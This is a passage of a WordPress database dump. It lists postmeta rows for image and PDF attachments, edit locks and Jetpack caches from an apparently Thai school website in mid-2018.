(7487, 3228, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1296;s:6:\"height\";i:864;s:4:\"file\";s:58:\"2018/06/36300534_608923609483831_6523644088095342592_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"36300534_608923609483831_6523644088095342592_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"36300534_608923609483831_6523644088095342592_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"36300534_608923609483831_6523644088095342592_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"36300534_608923609483831_6523644088095342592_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"36300534_608923609483831_6523644088095342592_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7488, 3224, '_thumbnail_id', '3228'),
(7491, 3224, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575612172;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3961;}i:1;a:1:{s:2:\"id\";i:3954;}i:2;a:1:{s:2:\"id\";i:4017;}}}}'),
(7492, 3229, '_edit_lock', '1530069319:3'),
(7493, 3229, '_edit_last', '3'),
(7494, 3230, '_wp_attached_file', '2018/06/27-6-2561-9-47-06.jpg'),
(7495, 3230, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:580;s:6:\"height\";i:154;s:4:\"file\";s:29:\"2018/06/27-6-2561-9-47-06.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"27-6-2561-9-47-06-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"27-6-2561-9-47-06-300x80.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:80;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"27-6-2561-9-47-06-400x106.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:106;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7496, 3231, '_wp_attached_file', '2018/06/27-6-2561-10-12-06.jpg'),
(7497, 3231, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:956;s:6:\"height\";i:345;s:4:\"file\";s:30:\"2018/06/27-6-2561-10-12-06.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"27-6-2561-10-12-06-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"27-6-2561-10-12-06-300x108.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:108;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"27-6-2561-10-12-06-768x277.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:277;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"27-6-2561-10-12-06-400x144.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:144;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7498, 3232, '_wp_attached_file', '2018/06/27-6-2561-10-15-09.jpg'),
(7499, 3232, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:194;s:6:\"height\";i:245;s:4:\"file\";s:30:\"2018/06/27-6-2561-10-15-09.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"27-6-2561-10-15-09-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7500, 3229, '_hide_featured', NULL),
(7501, 3235, '_edit_lock', '1545293576:3'),
(7502, 3235, '_edit_last', '3'),
(7503, 3236, '_wp_attached_file', '2018/06/27-6-2561-10-59-36.jpg'),
(7504, 3236, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:581;s:6:\"height\";i:155;s:4:\"file\";s:30:\"2018/06/27-6-2561-10-59-36.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"27-6-2561-10-59-36-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"27-6-2561-10-59-36-300x80.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:80;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"27-6-2561-10-59-36-400x107.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:107;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7505, 3237, '_wp_attached_file', '2018/06/27-6-2561-10-59-50.jpg'),
(7506, 3237, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:194;s:6:\"height\";i:241;s:4:\"file\";s:30:\"2018/06/27-6-2561-10-59-50.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"27-6-2561-10-59-50-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7511, 3235, '_hide_featured', NULL),
(7512, 3243, '_wp_attached_file', '2018/06/27-6-2561-14-58-31.jpg'),
(7513, 3243, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:878;s:6:\"height\";i:383;s:4:\"file\";s:30:\"2018/06/27-6-2561-14-58-31.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"27-6-2561-14-58-31-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"27-6-2561-14-58-31-300x131.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:131;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"27-6-2561-14-58-31-768x335.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:335;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"27-6-2561-14-58-31-400x174.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7514, 3244, '_wp_attached_file', '2018/06/27-6-2561-15-02-29.jpg'),
(7515, 3244, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:793;s:6:\"height\";i:553;s:4:\"file\";s:30:\"2018/06/27-6-2561-15-02-29.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"27-6-2561-15-02-29-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"27-6-2561-15-02-29-300x209.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:209;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"27-6-2561-15-02-29-768x536.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"27-6-2561-15-02-29-400x279.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:279;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7516, 3246, '_wp_attached_file', '2018/06/27-6-2561-15-39-56.jpg'),
(7517, 3246, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1104;s:6:\"height\";i:593;s:4:\"file\";s:30:\"2018/06/27-6-2561-15-39-56.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"27-6-2561-15-39-56-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"27-6-2561-15-39-56-300x161.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:161;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"27-6-2561-15-39-56-768x413.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:413;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"27-6-2561-15-39-56-1024x550.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"27-6-2561-15-39-56-400x215.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7518, 3248, '_wp_attached_file', '2018/06/27-6-2561-15-44-00.jpg'),
(7519, 3248, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:885;s:6:\"height\";i:500;s:4:\"file\";s:30:\"2018/06/27-6-2561-15-44-00.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"27-6-2561-15-44-00-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"27-6-2561-15-44-00-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"27-6-2561-15-44-00-768x434.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:434;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"27-6-2561-15-44-00-400x226.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:226;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7522, 3250, '_wp_attached_file', '2018/06/27-6-2561-15-46-00.jpg'),
(7523, 3250, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:668;s:6:\"height\";i:645;s:4:\"file\";s:30:\"2018/06/27-6-2561-15-46-00.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"27-6-2561-15-46-00-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"27-6-2561-15-46-00-300x290.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:290;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"27-6-2561-15-46-00-311x300.jpg\";s:5:\"width\";i:311;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7527, 3254, '_edit_lock', '1530092203:3'),
(7528, 3254, '_edit_last', '3'),
(7529, 3255, '_wp_attached_file', '2018/06/ประกาศ-เผยแพร่แผนการจัดซื้อจัดจ้าง-2561.pdf'),
(7533, 3254, '_hide_featured', NULL),
(7534, 3254, '_wpas_done_all', '1'),
(7535, 3254, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575570760;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4907;}i:1;a:1:{s:2:\"id\";i:4154;}i:2;a:1:{s:2:\"id\";i:4975;}}}}'),
(7538, 3260, '_wp_attached_file', '2018/06/29-6-2561-9-13-09.jpg'),
(7539, 3260, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:927;s:6:\"height\";i:332;s:4:\"file\";s:29:\"2018/06/29-6-2561-9-13-09.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"29-6-2561-9-13-09-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"29-6-2561-9-13-09-300x107.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:107;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"29-6-2561-9-13-09-768x275.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:275;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"29-6-2561-9-13-09-400x143.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:143;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7540, 3262, '_wp_attached_file', '2018/06/29-6-2561-9-17-22.jpg'),
(7541, 3262, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:935;s:6:\"height\";i:627;s:4:\"file\";s:29:\"2018/06/29-6-2561-9-17-22.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"29-6-2561-9-17-22-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"29-6-2561-9-17-22-300x201.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:201;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"29-6-2561-9-17-22-768x515.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:515;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"29-6-2561-9-17-22-400x268.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:268;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7542, 3264, '_edit_lock', '1530246384:3'),
(7543, 3264, '_edit_last', '3'),
(7544, 3265, '_wp_attached_file', '2018/06/ประกาศ-ผลการสอบคัดเลือก-ครูอัตราจ้าง-5-อัตรา.pdf'),
(7548, 3264, '_hide_featured', NULL),
(7549, 3264, '_wpas_done_all', '1'),
(7550, 3264, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575398468;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5046;}i:1;a:1:{s:2:\"id\";i:4139;}i:2;a:1:{s:2:\"id\";i:5481;}}}}'),
(7553, 3268, '_edit_lock', '1530265631:3'),
(7554, 3268, '_edit_last', '3'),
(7559, 3268, '_hide_featured', NULL),
(7560, 3268, '_wpas_done_all', '1'),
(7563, 3268, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575487531;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4662;}i:1;a:1:{s:2:\"id\";i:4172;}i:2;a:1:{s:2:\"id\";i:4006;}}}}'),
(7564, 3275, '_edit_lock', '1530515621:3'),
(7565, 3275, '_edit_last', '3'),
(7566, 3276, '_wp_attached_file', '2018/07/36308686_610886089287583_4734090949980848128_o.jpg'),
(7567, 3276, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:58:\"2018/07/36308686_610886089287583_4734090949980848128_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"36308686_610886089287583_4734090949980848128_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"36308686_610886089287583_4734090949980848128_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"36308686_610886089287583_4734090949980848128_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"36308686_610886089287583_4734090949980848128_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"36308686_610886089287583_4734090949980848128_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7568, 3275, '_thumbnail_id', '3276'),
(7572, 3275, '_hide_featured', NULL),
(7573, 3275, '_wpas_done_all', '1'),
(7574, 3275, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575447796;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5900;}i:1;a:1:{s:2:\"id\";i:6071;}i:2;a:1:{s:2:\"id\";i:4958;}}}}'),
(7575, 3280, '_edit_lock', '1530609405:3'),
(7576, 3280, '_edit_last', '3'),
(7577, 3281, '_wp_attached_file', '2018/07/ประกวดราคาจ้างก่อสร้างโดมพระวิษณุ.pdf'),
(7581, 3280, '_hide_featured', NULL),
(7582, 3280, '_wpas_done_all', '1'),
(7583, 3280, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575360706;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5481;}i:1;a:1:{s:2:\"id\";i:6265;}i:2;a:1:{s:2:\"id\";i:6008;}}}}'),
(7584, 3284, '_edit_lock', '1530689868:3'),
(7585, 3284, '_edit_last', '3'),
(7586, 3285, '_wp_attached_file', '2018/07/4-7-2561-10-37-00.jpg'),
(7587, 3285, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:190;s:6:\"height\";i:239;s:4:\"file\";s:29:\"2018/07/4-7-2561-10-37-00.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"4-7-2561-10-37-00-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7588, 3286, '_wp_attached_file', '2018/07/4-7-2561-10-37-15.jpg'),
(7589, 3286, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:581;s:6:\"height\";i:155;s:4:\"file\";s:29:\"2018/07/4-7-2561-10-37-15.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"4-7-2561-10-37-15-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"4-7-2561-10-37-15-300x80.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:80;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"4-7-2561-10-37-15-400x107.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:107;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7590, 3287, '_wp_attached_file', '2018/07/4-7-2561-11-20-32.jpg'),
(7591, 3287, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:954;s:6:\"height\";i:325;s:4:\"file\";s:29:\"2018/07/4-7-2561-11-20-32.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"4-7-2561-11-20-32-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"4-7-2561-11-20-32-300x102.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:102;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"4-7-2561-11-20-32-768x262.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:262;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"4-7-2561-11-20-32-400x136.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:136;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\